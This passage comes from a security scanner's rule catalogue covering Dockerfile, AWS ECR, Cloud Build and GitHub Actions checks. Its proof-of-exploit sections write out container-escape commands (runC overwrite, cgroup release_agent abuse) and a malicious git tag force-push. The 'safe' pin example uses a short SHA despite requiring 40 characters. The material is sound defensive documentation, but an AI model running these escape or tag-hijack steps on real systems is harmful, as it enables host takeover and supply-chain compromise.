- Docker Hub typosquatting / namespace-takeover incidents (2017 onward): Sysdig and Aqua research documented thousands of malicious images uploaded under near-miss names (docker-library look-alikes, alpine vs alphine, etc.) and occasional namespace recoveries shipping crypto-miners downstream. Digest-pinned consumers are immune; tag-pinned consumers pull whatever sits under the name today.
- Codecov codecov/codecov-action tag-mutation incident (post-Codecov-Bash-uploader compromise): the upstream rotated the action's @v3 tag during the fallout, and consumers pinning to the tag silently re-ran a different build than before. Digest pinning would have surfaced the change as a checksum mismatch instead of a silent swap.
Source: DF-001 in the Dockerfile provider.
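The classification the primitive applies can be sketched in a few lines. This is an illustrative approximation, not the real _primitives/image_pinning API; function and category names are assumptions:

```python
def classify_image_ref(ref: str) -> str:
    """Rough sketch of DF-001's floating-tag classification."""
    if "@sha256:" in ref:
        return "PINNED_DIGEST"          # the only form that passes
    last = ref.rsplit("/", 1)[-1]       # strip registry/namespace parts
    if ":" in last:
        tag = last.rsplit(":", 1)[-1]
        # a version-looking tag is still mutable registry-side
        return "FLOATING" if tag == "latest" else "PINNED_TAG"
    return "FLOATING"                   # bare ref implies :latest
```

Both PINNED_TAG and FLOATING are reported as unpinned; only PINNED_DIGEST survives.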
DF-002: Container runs as root (missing or root USER directive) HIGH 🔧 fix
Evidences: CC6.1 Logical access controls restrict entities to authorized system resources, CC6.8 Controls prevent or detect the introduction of malicious software.
How this is detected. Multi-stage builds: only the final stage matters for runtime identity, since intermediate stages don't ship. The check scopes USER to the last FROM through end-of-file.
Recommendation. Add a USER <non-root> directive after package install steps (e.g. USER 1001 or USER appuser). Running as root inside a container is not isolation: a kernel CVE, a misconfigured mount, or a mis-applied capability collapses straight into the host.
Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.
Seen in the wild.
- CVE-2019-5736 (runC host breakout): a malicious container running as root could overwrite the host's runC binary and compromise every other container on the node. Non-root containers were not exploitable.
- CVE-2022-0492 (cgroups v1 escape via release_agent): root inside a container with CAP_SYS_ADMIN could write to the host's release_agent file and execute arbitrary host code. Containers running as a non-root UID side-stepped the exploit class entirely.
Proof of exploit.
Vulnerable: image runs as root by default (no USER set).

```dockerfile
FROM ubuntu:22.04
RUN apt-get update && apt-get install -y python3
COPY app.py /app/
CMD ["python3", "/app/app.py"]
```
Attack: when the container is breached (RCE in the app, a kernel CVE, a misconfigured mount), the attacker runs as UID 0. From there:

```shell
# CVE-2019-5736 path: overwrite /proc/self/exe to corrupt the host's
# runC binary; every container on the node is affected, and the next
# launch executes attacker code on the host:
echo '#!/bin/sh\n/attacker_payload' > /proc/self/exe

# CVE-2022-0492 path: cgroup release_agent escape:
mkdir /tmp/cg && mount -t cgroup -o memory cgroup /tmp/cg
echo '/payload' > /tmp/cg/release_agent
echo 1 > /tmp/cg/notify_on_release
```

A non-root UID makes both paths fail at the first syscall.
Safe: drop to a dedicated unprivileged user.

```dockerfile
FROM ubuntu:22.04
RUN apt-get update && apt-get install -y python3 \
 && useradd --uid 1001 --create-home app
COPY --chown=app:app app.py /app/
USER 1001
CMD ["python3", "/app/app.py"]
```
Source: DF-002 in the Dockerfile provider.
DF-003: ADD pulls remote URL without integrity verification HIGH
Evidences: CC6.7 Data in transit is protected from unauthorized disclosure, CC8.1 Changes to infrastructure, data, software, and procedures are authorized, designed, tested, approved, and implemented.
How this is detected. ADD with a URL is the historical Dockerfile footgun: it fetches at build time over HTTP(S) with no checksum and no signature, and the registry tag does not pin the source. A tampered server or DNS hijack silently swaps the content. COPY is for local files; RUN curl + verify is for remote ones.
Recommendation. Replace ADD https://... with a multi-step RUN: download the file with curl -fsSLo, verify a known-good checksum (sha256sum -c) or signature (cosign verify-blob), then extract / install. Better still: download the artifact in a builder stage and COPY it across. That way the verifier runs once at build time, not per-pull.
Source: DF-003 in the Dockerfile provider.
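The builder-stage shape the recommendation describes might look like this (the URL, digest placeholder, and tool paths are illustrative):

```dockerfile
FROM debian:12-slim AS fetch
RUN apt-get update && apt-get install -y --no-install-recommends curl ca-certificates \
 && curl -fsSLo /tmp/tool.tar.gz https://example.com/tool-1.2.3.tar.gz \
 && echo '<expected-sha256>  /tmp/tool.tar.gz' | sha256sum -c - \
 && tar -xzf /tmp/tool.tar.gz -C /usr/local/bin

FROM debian:12-slim
# the verifier ran once, in the builder stage; only the artifact ships
COPY --from=fetch /usr/local/bin/tool /usr/local/bin/tool
```

Note the two spaces between digest and path: sha256sum -c rejects lines with a single separator character.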
DF-004: RUN executes a remote script via curl-pipe / wget-pipe HIGH
Evidences: CC6.7 Data in transit is protected from unauthorized disclosure, CC8.1 Changes to infrastructure, data, software, and procedures are authorized, designed, tested, approved, and implemented.
How this is detected. Reuses _primitives/remote_script_exec.scan so the vocabulary matches the equivalent CI-side rules (GHA-016, GL-016, BB-012, ADO-016, CC-016, JF-016).
Recommendation. Download to a file, verify the checksum or signature, then execute: curl -fsSL <url> -o /tmp/x.sh && echo '<digest>  /tmp/x.sh' | sha256sum -c - && bash /tmp/x.sh (note the two spaces sha256sum -c requires between digest and path). Vendor installers from well-known hosts (rustup.rs, get.docker.com, ...) are reported with vendor_trusted=true so reviewers can calibrate.
Source: DF-004 in the Dockerfile provider.
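A stripped-down version of the pattern the primitive hunts for can be expressed as a single regex. This is an illustrative sketch; the real _primitives/remote_script_exec.scan is richer (vendor allow-listing, multi-line RUN handling):

```python
import re

# fetch command, anything short of a command separator, then a pipe into a shell
PIPE_EXEC = re.compile(r"\b(curl|wget)\b[^|;&]*\|\s*(?:ba|z|da)?sh\b")

def has_remote_pipe_exec(run_cmd: str) -> bool:
    """True when a RUN line pipes a remote fetch straight into a shell."""
    return bool(PIPE_EXEC.search(run_cmd))
```

The download-verify-execute pattern from the recommendation does not match, because the fetch and the shell invocation are separated by && rather than a pipe.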
DF-005: RUN uses shell-eval (eval / sh -c on a variable / backticks) HIGH
Evidences: CC6.8 Controls prevent or detect the introduction of malicious software.
How this is detected. Reuses _primitives/shell_eval.scan, same primitive used by GHA-028 / GL-026 / BB-026 / ADO-027 / CC-027 / JF-030 so the safe / unsafe vocabulary matches across the tool.
Recommendation. Replace eval "$X" and sh -c "$X" with explicit argv invocations. If the build genuinely needs a templated command, render it through a sealed config file or use RUN --mount=type=secret with explicit input. $( … ) / backticks should never wrap interpolated user-controlled vars inside a Dockerfile.
Source: DF-005 in the Dockerfile provider.
DF-006: ENV or ARG carries a credential-shaped literal value CRITICAL
Evidences: CC6.1 Logical access controls restrict entities to authorized system resources.
How this is detected. Reuses _primitives/secret_shapes, flags AKIA-prefixed AWS keys outright (the literal AWS access-key shape) and credential-named keys (API_KEY, DB_PASSWORD, SECRET_TOKEN) when the value is a non-empty literal.
Recommendation. Never hard-code credentials in a Dockerfile. ENV values are baked into the image layer history; even if the value is later overwritten, docker history --no-trunc reads the original. Use RUN --mount=type=secret for build-time secrets or runtime env injection (docker run -e SECRET=…) for runtime ones. Rotate any secret already exposed.
Source: DF-006 in the Dockerfile provider.
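The two triggers described above can be sketched as follows. This is an approximation for intuition; the real _primitives/secret_shapes pattern set is broader than these two expressions:

```python
import re

# literal AWS access-key shape: AKIA followed by 16 uppercase base-36 chars
AWS_ACCESS_KEY = re.compile(r"\bAKIA[0-9A-Z]{16}\b")
# credential-named keys such as API_KEY, DB_PASSWORD, SECRET_TOKEN
CRED_NAME = re.compile(r"API_?KEY|PASS(WORD)?|SECRET|TOKEN", re.IGNORECASE)

def flags_env_arg(name: str, value: str) -> bool:
    """Fire on a key-shaped value outright, or a credential name + non-empty literal."""
    if AWS_ACCESS_KEY.search(value):
        return True
    return bool(value) and bool(CRED_NAME.search(name))
```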
DF-007: No HEALTHCHECK directive declared LOW 🔧 fix
Evidences: CC7.2 System components are monitored for anomalies indicative of malicious acts or failures.
How this is detected. This is a defense-in-depth signal rather than an exploitation indicator, so severity is LOW. A missing healthcheck doesn't create a vulnerability on its own, but downstream orchestrators (Kubernetes, ECS, Compose) cannot recover an unhealthy container they cannot detect, and that turns a soft failure (slow leak, deadlock) into a stale-process incident.
Recommendation. Declare a HEALTHCHECK so the orchestrator can detect stuck or zombie containers. Example: HEALTHCHECK --interval=30s --timeout=5s --retries=3 CMD curl -fsS http://localhost/healthz || exit 1. Skip this for builder/multi-stage intermediate images, only the runtime image needs one.
Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.
Source: DF-007 in the Dockerfile provider.
DF-008: RUN invokes docker --privileged or escalates capabilities HIGH
Evidences: CC6.1 Logical access controls restrict entities to authorized system resources, CC6.8 Controls prevent or detect the introduction of malicious software.
How this is detected. Mirrors GHA-017 / GL-017 / BB-013 / ADO-017 / CC-017 / JF-017 (docker run --privileged in CI scripts) but at Dockerfile build time. The risk is subtler: a privileged RUN step doesn't directly elevate the resulting image, but it gives the build host's docker daemon a chance to escape, and any tampered base image can exploit the elevated build.
Recommendation. A Dockerfile build step almost never legitimately needs --privileged or --cap-add SYS_ADMIN / ALL. If the build genuinely requires elevated capabilities (e.g. compiling a kernel module), do it in a sealed builder image and COPY the artifact out, don't carry the privileged execution into the runtime image.
Source: DF-008 in the Dockerfile provider.
DF-010: apt-get dist-upgrade / upgrade pulls unknown package versions LOW
Evidences: CC8.1 Changes to infrastructure, data, software, and procedures are authorized, designed, tested, approved, and implemented.
How this is detected. Running apt-get upgrade (or dist-upgrade) inside a Dockerfile is the classic pet-vs-cattle anti-pattern. Two back-to-back builds with the same Dockerfile can produce different images because the upstream archive moved between the two RUN invocations. dist-upgrade additionally relaxes dependency resolution. It can install / remove arbitrary packages to satisfy upgrades, so the resulting image's package set isn't even bounded by what the Dockerfile declares.
Recommendation. Drop the upgrade step. Build on a recent base image instead (rebuild your image when the base image gets a security patch, pin the base by digest per DF-001 so the rebuild is deterministic). apt-get install pkg=<version> for specific packages stays reproducible; upgrade / dist-upgrade does not.
Source: DF-010 in the Dockerfile provider.
DF-012: RUN invokes sudo HIGH
Evidences: CC6.1 Logical access controls restrict entities to authorized system resources.
How this is detected. sudo inside a Dockerfile is almost always a copy-paste from a host README. Its presence usually means one of three things, all of them wrong: (a) the build is silently running as root and the operator misread it, (b) the image carries an unrestricted sudoers line that a runtime escape can abuse, or (c) the package install chain depends on TTY-aware sudo behavior that breaks under non-TTY docker build. None of these cases benefit from keeping the directive.
Recommendation. Drop sudo from the RUN. Either the build is already running as root (the default before any USER directive), in which case sudo is no-op noise, or the build switched to a non-root USER and needs root for a specific step, in which case temporarily revert with USER root for that RUN and switch back afterward.
Source: DF-012 in the Dockerfile provider.
DF-013: EXPOSE declares sensitive remote-access port CRITICAL 🔧 fix
Evidences: CC6.6 Boundary-protection measures restrict access from outside the system boundary, CC6.8 Controls prevent or detect the introduction of malicious software.
How this is detected. EXPOSE is documentation, not a firewall. It doesn't actually open the port. But EXPOSE 22 is a strong signal the image runs sshd, and any remote-access daemon inside the container blows up the threat model: now you have an extra auth surface, an extra service to keep patched, and a way for a compromised app to phone home from the outside. The container runtime / orchestrator's exec path covers every operational use case sshd traditionally served.
Recommendation. Remove the EXPOSE line for the remote-access port. If the operator legitimately needs to reach the container, exec into it (docker exec / kubectl exec). That path uses the orchestrator's auth and audit, doesn't open a network port, and doesn't ship an extra daemon inside the image. Containers should not run sshd / telnetd / ftpd / rsh-d / vncd / RDP alongside the application.
Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.
Source: DF-013 in the Dockerfile provider.
DF-014: WORKDIR set to a system / kernel filesystem path CRITICAL
Evidences: CC6.8 Controls prevent or detect the introduction of malicious software.
How this is detected. Subsequent directives in the Dockerfile (COPY src dest, RUN writes, ADD …) resolve relative paths against the active WORKDIR. A WORKDIR /sys followed by COPY conf.txt config.txt writes into the kernel's sysfs surface: at best a build-time error, at worst a container-escape primitive that lets a compromised step manipulate cgroups, devices, or kernel config.
Recommendation. Move WORKDIR to a dedicated app directory (/app, /srv/app, /opt/<service>). System paths like /sys, /proc, /dev, /etc, / and the root home are not application directories; pointing the working dir at one means subsequent COPY / RUN writes target kernel-exposed namespaces or admin-only configuration.
Source: DF-014 in the Dockerfile provider.
DF-015: RUN grants world-writable permissions (chmod 777 / a+w) MEDIUM
Evidences: CC6.8 Controls prevent or detect the introduction of malicious software.
How this is detected. World-writable directories under / are an established container-escape vector: any compromised process running as non-root can drop a payload that root-owned daemons later execute. The rule fires on the literal 777, a+w, and a+rwx modes; the more conservative 775 and ugo+x are not flagged.
Recommendation. Replace chmod 777 <path> with the narrowest permissions the workload actually needs. chmod 755 is enough for executables under a read-only root filesystem; 640 or 600 for files the runtime user reads. a+w is almost always copy-pasted from a Stack Overflow answer and almost never the correct fix.
Known false positives.
- Test fixtures or scratch builds that intentionally share a directory across multiple non-root users may legitimately use 777. Suppress with an ignore-file entry rather than weakening the rule.
Source: DF-015 in the Dockerfile provider.
DF-016: Image lacks OCI provenance labels LOW
Evidences: CC8.1 Changes to infrastructure, data, software, and procedures are authorized, designed, tested, approved, and implemented.
How this is detected. The OCI image-spec annotation set is a small de facto standard maintained by the OCI working group. Only image.source and image.revision are checked because they're the two whose absence makes incident response materially harder; image.title / image.description are nice-to-have but the rule doesn't fire on those.
Recommendation. Add a LABEL line carrying at least org.opencontainers.image.source (the URL of the source repo) and org.opencontainers.image.revision (the commit SHA built into the image). Most registries surface those fields in the UI and on manifest inspect, which closes the source-to-image gap that GHA-006 / SLSA Build-L2 provenance attestation also addresses.
Known false positives.
- A multi-stage build's intermediate stages don't need provenance labels; only the final image ships. The rule fires per Dockerfile, not per stage; suppress for files where the final FROM is an intentional throwaway scratch stage.
Source: DF-016 in the Dockerfile provider.
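A minimal remediation sketch (the repo URL is a placeholder; GIT_SHA is assumed to be supplied by CI via --build-arg):

```dockerfile
ARG GIT_SHA=unknown
LABEL org.opencontainers.image.source="https://github.com/acme/widget" \
      org.opencontainers.image.revision="${GIT_SHA}"
```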
DF-017: ENV PATH prepends a world-writable directory MEDIUM 🔧 fix
Evidences: CC6.8 Controls prevent or detect the introduction of malicious software.
How this is detected. A writable PATH entry that comes before the system bins lets any process inside the container shadow ls, ps, apt-get, cat, etc. by dropping a binary of the same name into the writable dir. On a multi-tenant image, or any image where an exploit can reach the filesystem, this is a free privilege-escalation vector.
Recommendation. Don't put /tmp, /var/tmp, /dev/shm, or any other world-writable path in PATH ahead of the system binary directories. Drop those entries entirely, or place them at the tail (ENV PATH=/usr/bin:$PATH:/tmp) so legitimate binaries always shadow anything dropped into the writable dir at runtime.
Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.
Source: DF-017 in the Dockerfile provider.
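The ordering heuristic behind this rule can be sketched as a walk over the PATH entries. An illustrative approximation, not the tool's actual implementation:

```python
WORLD_WRITABLE = {"/tmp", "/var/tmp", "/dev/shm"}
SYSTEM_BINS = {"/usr/local/bin", "/usr/bin", "/bin", "/usr/sbin", "/sbin"}

def unsafe_path_prepend(path_value: str) -> bool:
    """Does a world-writable dir appear in PATH before any system bin dir?"""
    for entry in path_value.split(":"):
        if entry in WORLD_WRITABLE:
            return True                 # writable dir shadows system bins
        if entry in SYSTEM_BINS:
            return False                # system bins win the lookup race
    return False
```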
DF-018: RUN chown rewrites ownership of a system path MEDIUM
Evidences: CC6.8 Controls prevent or detect the introduction of malicious software.
How this is detected. Recognises chown and chgrp invocations whose first non-flag path argument resolves under a system directory. The non-recursive case is also flagged because a single chown user /etc is just as harmful, the recursive flag matters for the size of the blast radius, not for whether it's wrong. Application paths under /opt, /srv, /var/lib/<app>, and /app are not flagged.
Recommendation. Don't chown system directories at build time. If the runtime user needs to own a workload-specific subtree, COPY --chown=<user>:<group> it into the image at the subtree root, or place the workload under a dedicated directory (e.g. /app, /srv/app) and chown only that path. Granting the runtime user write access to /etc, /usr, /sbin, or /lib lets a process exploit later steps to stage a binary the system trusts.
Source: DF-018 in the Dockerfile provider.
DF-019: COPY/ADD source path looks like a credential file HIGH 🔧 fix
Evidences: CC6.1 Logical access controls restrict entities to authorized system resources.
How this is detected. Fires on any COPY or ADD whose source basename is a well-known credential filename (id_rsa, .npmrc, .netrc, .env, terraform.tfvars, …) or whose path tail matches a canonical credential location (.aws/credentials, .docker/config.json, .kube/config). Files with private-key extensions (.pem, .key, .p12, .pfx, .jks) are also flagged. Globs are not expanded, the rule reads the literal source token.
Recommendation. Don't COPY credential files into an image. Anything baked into a layer is recoverable by anyone who can pull the image, even if a later step deletes the file. For build-time secrets (npm tokens, registry credentials, SSH deploy keys), use RUN --mount=type=secret,id=<name> so the value lives only for the duration of the step. For runtime secrets, mount them from the orchestrator (Kubernetes Secret, ECS task role, Vault sidecar) instead.
Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.
Known false positives.
- Empty placeholder files (.env shipped as a template, config.json carrying only public flags). Suppress with a brief .pipelinecheckignore rationale and prefer an explicit non-secret name (.env.example).
Source: DF-019 in the Dockerfile provider.
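The secret-mount pattern from the recommendation looks like this in practice (the secret id npmrc and the node base image are illustrative):

```dockerfile
# syntax=docker/dockerfile:1
FROM node:20-slim
WORKDIR /app
COPY package*.json ./
# the .npmrc exists only for the duration of this RUN step;
# it is never written into any image layer
RUN --mount=type=secret,id=npmrc,target=/root/.npmrc npm ci
```

Build with `docker build --secret id=npmrc,src=$HOME/.npmrc .` so BuildKit supplies the file at build time.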
DF-020: ARG declares a credential-named build argument HIGH 🔧 fix
Evidences: CC6.1 Logical access controls restrict entities to authorized system resources.
How this is detected. Complements DF-006 (which flags an ENV/ARG with a literal credential-shaped value). This rule fires on the name alone (ARG NPM_TOKEN, ARG GITHUB_PAT, ARG DB_PASSWORD), even when no default is set, because BuildKit records the resolved value in the image's history the moment --build-arg supplies one. Names are matched via the same _primitives/secret_shapes regex used by the other secret-name rules.
Recommendation. Don't pass secrets through ARG. Build arguments are recorded in docker history whether the value comes from a default or from --build-arg at build time, so a credential-named ARG leaks the secret to anyone who can pull the image. Use RUN --mount=type=secret,id=<name> and feed the value with BuildKit's --secret flag; the secret never lands in a layer or in the build history.
Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.
Known false positives.
- An ARG whose name matches the regex but is a non-secret config knob (a counter-example like ARG TOKEN_LIMIT). Rare; rename or suppress the finding with a brief rationale.
Source: DF-020 in the Dockerfile provider.
EB-001: No EventBridge rule for CodePipeline failure notifications MEDIUM
Evidences: CC7.2 System components are monitored for anomalies indicative of malicious acts or failures.
How this is detected. Pipeline failure events are emitted to EventBridge automatically; the missing piece is a rule that pipes them to somewhere a human reads (SNS, Slack, PagerDuty). Without it, failures only surface via the CodePipeline console, which no one watches.
Recommendation. Create an EventBridge rule matching detail-type: 'CodePipeline Pipeline Execution State Change' and state: FAILED, and point it at an SNS topic or chat webhook. Without it, pipeline failures during an incident (a compromise triggering rollback, for example) go unnoticed.
Source: EB-001 in the AWS provider.
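The event pattern for such a rule might look like the following (the SNS/webhook target is wired separately via the rule's targets):

```json
{
  "source": ["aws.codepipeline"],
  "detail-type": ["CodePipeline Pipeline Execution State Change"],
  "detail": { "state": ["FAILED"] }
}
```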
ECR-001: Image scanning on push not enabled HIGH
Evidences: CC6.8 Controls prevent or detect the introduction of malicious software.
How this is detected. scan-on-push runs a CVE check against the image's OS package layers at the moment it lands in ECR. Without it, an image with a known CVE deploys silently. The ECR basic scanner is free; ECR-007 covers the Inspector v2 enhanced scanner that adds language-ecosystem CVEs (npm, pip, gem).
Recommendation. Enable imageScanningConfiguration.scanOnPush on the repository. Consider also enabling Amazon Inspector continuous scanning for ongoing CVE detection against images already in the registry.
Source: ECR-001 in the AWS provider.
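Enabling it is a single CLI call per repository (the repository name is a placeholder):

```shell
aws ecr put-image-scanning-configuration \
  --repository-name my-repo \
  --image-scanning-configuration scanOnPush=true
```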
ECR-002: Image tags are mutable HIGH
Evidences: CC7.1 Detection procedures identify configuration changes that introduce vulnerabilities.
How this is detected. Mutable tags mean :latest, :v1.0, and :stable can be re-pushed silently: the same tag points to different image content over time. Pinning by digest (sha256:...) in deployment manifests is the only durable reference; IMMUTABLE on the repo enforces the property registry-side so a forgotten digest reference doesn't drift.
Recommendation. Set imageTagMutability=IMMUTABLE on the repository. Reference images by digest (sha256:...) in deployment manifests for strongest immutability guarantees.
Source: ECR-002 in the AWS provider.
ECR-003: Repository policy allows public access CRITICAL
Evidences: CC6.6 Boundary-protection measures restrict access from outside the system boundary.
How this is detected. A wildcard-principal repo policy means anyone on the internet can pull images. That is sometimes intentional (a publicly-distributed base image), but it should be a deliberate exposure, typically via the ECR Public registry rather than a private repo with a public policy. The default for build-output images should never be public.
Recommendation. Remove wildcard principals from the repository policy. Grant access only to specific AWS account IDs or IAM principals that require it.
Source: ECR-003 in the AWS provider.
ECR-007: Inspector v2 enhanced scanning disabled for ECR MEDIUM
Evidences: CC6.8 Controls prevent or detect the introduction of malicious software.
How this is detected. ECR-001's basic on-push scan covers OS-level packages, apt / yum / apk lineage. Most production CVE risk is in language ecosystems (npm, pip, gem, mvn) which the basic scanner ignores. Inspector v2 enhanced scanning closes that gap and runs continuously, so a CVE published two weeks after a build still surfaces against the deployed image.
Recommendation. Enable Amazon Inspector v2 for the ECR scan type on this account. Basic ECR scanning on-push only covers OS packages; Inspector v2 enhanced scanning adds language-ecosystem CVEs and runs continuously as new vulnerabilities are published.
Source: ECR-007 in the AWS provider.
GCB-001: Cloud Build step image not pinned by digest HIGH 🔧 fix
Evidences: CC8.1 Changes to infrastructure, data, software, and procedures are authorized, designed, tested, approved, and implemented.
How this is detected. Bare references (gcr.io/cloud-builders/docker) are treated as :latest by Cloud Build. Tag-only references (:20, :latest) count as unpinned. Only @sha256:… suffixes pass.
Recommendation. Pin every steps[].name image to an @sha256:<digest> suffix. gcr.io/cloud-builders/docker:latest is mutable; Google publishes new builder images frequently and the next build would pull whatever is current. Resolve the digest with gcloud artifacts docker images describe <ref> --format='value(image_summary.digest)' and pin it.
Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.
Source: GCB-001 in the Cloud Build provider.
GCB-002: Cloud Build uses the default service account HIGH
Evidences: CC6.1 Logical access controls restrict entities to authorized system resources.
How this is detected. The default Cloud Build service account historically held roles/cloudbuild.builds.builder plus project-level editor in many organisations. Even under the GCP April-2024 default-identity change, the default SA is still broader than what a single pipeline needs. Explicit serviceAccount: is required to pass.
Recommendation. Create a dedicated service account for the build, grant it only the roles the pipeline actually needs (roles/artifactregistry.writer, roles/storage.objectCreator for artifact upload, etc.), and set serviceAccount: projects/<PROJECT>/serviceAccounts/<NAME>@.... Leaving it unset falls back to the default Cloud Build SA, which accumulates roles over a project's lifetime and is routinely granted roles/editor.
Source: GCB-002 in the Cloud Build provider.
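In cloudbuild.yaml the explicit identity is a top-level field (project and account names are placeholders; note that Cloud Build requires an explicit logging mode once a custom service account is set):

```yaml
serviceAccount: projects/my-proj/serviceAccounts/ci-builder@my-proj.iam.gserviceaccount.com
options:
  logging: CLOUD_LOGGING_ONLY   # required alongside a custom service account
```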
GCB-003: Secret Manager value referenced in step args HIGH
Evidences: CC6.2 New internal and external users are registered, authorized, and provisioned.
How this is detected. Detection patterns: literal projects/<n>/secrets/<name>/versions/... URIs, gcloud secrets versions access shell invocations, and $(gcloud secrets …) command substitutions in step args or entrypoint.
Recommendation. Map the secret under availableSecrets.secretManager[] with an env: alias, then reference it from each step via secretEnv: [ALIAS]. Avoid inline gcloud secrets versions access in args; the resolved plaintext lands in build logs.
Source: GCB-003 in the Cloud Build provider.
GCB-006: Dangerous shell idiom (eval, sh -c variable, backtick exec) HIGH
Evidences: CC6.8 Controls prevent or detect the introduction of malicious software.
How this is detected. Complements GCB-004 (dynamicSubstitutions + user substitution in args). GCB-006 fires on intrinsically risky shell idioms (eval, sh -c "$X", backtick exec) regardless of whether the substitution source is currently trusted.
Recommendation. Replace eval "$VAR" / sh -c "$VAR" / backtick exec with direct command invocation. Validate or allow-list any value that must feed a dynamic command at the boundary. In Cloud Build these idioms typically appear in args: [-c, ...] entries under a bash entrypoint.
Known false positives.
- eval "$(ssh-agent -s)" and similar eval "$(<literal-tool>)" bootstrap idioms are intentionally NOT flagged; the substituted command is literal, only its output is eval'd.
Source: GCB-006 in the Cloud Build provider.
GCB-007: availableSecrets references versions/latest MEDIUM 🔧 fix
Evidences: CC6.3 Access modifications (including revocation) are tracked and timely, CC7.1 Detection procedures identify configuration changes that introduce vulnerabilities.
How this is detected. versions/latest is documented as a rolling alias. A build run on Monday and a re-run on Tuesday can consume different secret bodies without any change to cloudbuild.yaml, breaking the reproducibility invariant that pinning protects.
Recommendation. Pin each availableSecrets.secretManager[].versionName to a specific version number (.../versions/7) rather than latest. Rotate by updating the number when a new version is promoted, not by silently publishing a new version that the next build pulls.
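A before/after sketch (secret name and version number are placeholders):

```yaml
availableSecrets:
  secretManager:
    # Flagged: rolling alias, a re-run can pull a different secret body
    # - versionName: projects/my-project/secrets/api-key/versions/latest
    #   env: API_KEY
    # Passes: explicit version, rotation becomes a reviewed YAML change
    - versionName: projects/my-project/secrets/api-key/versions/7
      env: API_KEY
```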
Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.
Source: GCB-007 in the Cloud Build provider.
GCB-008: No vulnerability scanning step in Cloud Build pipeline MEDIUM
Evidences: CC6.8 Controls prevent or detect the introduction of malicious software.
How this is detected. The detector matches tool names anywhere in the document: step images, args, or entrypoint strings. Container Analysis API scanning configured at the project level counts as a compensating control but is out of scope for this YAML-only check; if you rely on it, suppress this rule via --checks.
Recommendation. Add a step that runs a vulnerability scanner: trivy, grype, snyk test, npm audit, pip-audit, osv-scanner, or govulncheck. In Cloud Build this typically looks like a step with name: aquasec/trivy or an entrypoint: bash step that invokes trivy image / grype <ref> on the built image.
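A sketch of a trivy gate in cloudbuild.yaml (the image path is a placeholder; in a real pipeline the scanner image itself should also be pinned):

```yaml
steps:
  - name: gcr.io/cloud-builders/docker
    args: ['build', '-t', 'us-docker.pkg.dev/my-project/app/api:$SHORT_SHA', '.']
  # Fail the build on HIGH/CRITICAL findings in the freshly built image
  - name: aquasec/trivy
    args: ['image', '--exit-code', '1', '--severity', 'HIGH,CRITICAL',
           'us-docker.pkg.dev/my-project/app/api:$SHORT_SHA']
```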
Source: GCB-008 in the Cloud Build provider.
GCB-009: Artifacts not signed (no cosign / sigstore step) MEDIUM
Evidences: CC8.1 Changes to infrastructure, data, software, and procedures are authorized, designed, tested, approved, and implemented.
How this is detected. Silent-pass when the pipeline does not appear to produce artifacts (no docker push / gcloud run deploy / kubectl apply / etc. in any step). The detector matches cosign, sigstore, slsa-framework, and notation.
Recommendation. Add a signing step before images: is resolved, for example, a step with name: gcr.io/projectsigstore/cosign that runs cosign sign --yes <registry>/<repo>@<digest>. Pair with an attestation step (cosign attest --predicate sbom.json --type cyclonedx) so consumers can verify both the signature and the build provenance.
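A sketch of the signing step (registry path and digest are placeholders; cosign keyless signing additionally needs an identity token or a KMS key configured for the build):

```yaml
steps:
  # ...build and push steps above resolve the image digest...
  - name: gcr.io/projectsigstore/cosign
    entrypoint: cosign
    args: ['sign', '--yes', 'us-docker.pkg.dev/my-project/app/api@sha256:<digest>']
```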
Source: GCB-009 in the Cloud Build provider.
GHA-001: Action not pinned to commit SHA HIGH 🔧 fix
Evidences: CC8.1 Changes to infrastructure, data, software, and procedures are authorized, designed, tested, approved, and implemented.
How this is detected. Every uses: reference should pin a specific 40-char commit SHA. Tag and branch refs (@v4, @main) can be silently moved to malicious commits by whoever controls the upstream repository; a third-party action compromise will propagate into the pipeline on the next run.
Recommendation. Replace tag/branch references (@v4, @main) with the full 40-char commit SHA. Use Dependabot or StepSecurity to keep the pins fresh.
Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.
Seen in the wild.
- tj-actions/changed-files compromise (CVE-2025-30066, March 2025): a malicious commit retagged behind @v1/@v45 shipped CI-secret exfiltration to roughly 23,000 repos that had pinned the action to a mutable tag instead of a commit SHA.
- reviewdog/action-setup compromise (CVE-2025-30154, March 2025): same week, similar mechanism. Tag-pinned consumers auto-pulled the malicious version; SHA-pinned consumers were unaffected.
Proof of exploit.
Tag-pinned reference (vulnerable):
- uses: tj-actions/changed-files@v45
Attack: the upstream maintainer (or anyone who compromises
the upstream repo) force-moves the v45 tag to a malicious
commit:
git tag -f v45
git push --force origin v45
Every consumer's next workflow run pulls the new code
automatically, executing the attacker's payload with the
job's secrets and GITHUB_TOKEN in scope.
Safe: pin to a 40-char commit SHA (immutable):
- uses: tj-actions/changed-files@a284dc1 # v45.0.0
Source: GHA-001 in the GitHub Actions provider.
GHA-003: Script injection via untrusted context HIGH 🔧 fix
Evidences: CC6.8 Controls prevent or detect the introduction of malicious software.
How this is detected. Interpolating attacker-controlled context fields (PR title/body, issue body, comment body, commit message, discussion body, head branch name, github.ref_name, inputs.*, release metadata, deployment payloads) directly into a run: block is shell injection. GitHub expands ${{ ... }} BEFORE shell quoting, so any backtick, $(), or ; in the source field executes.
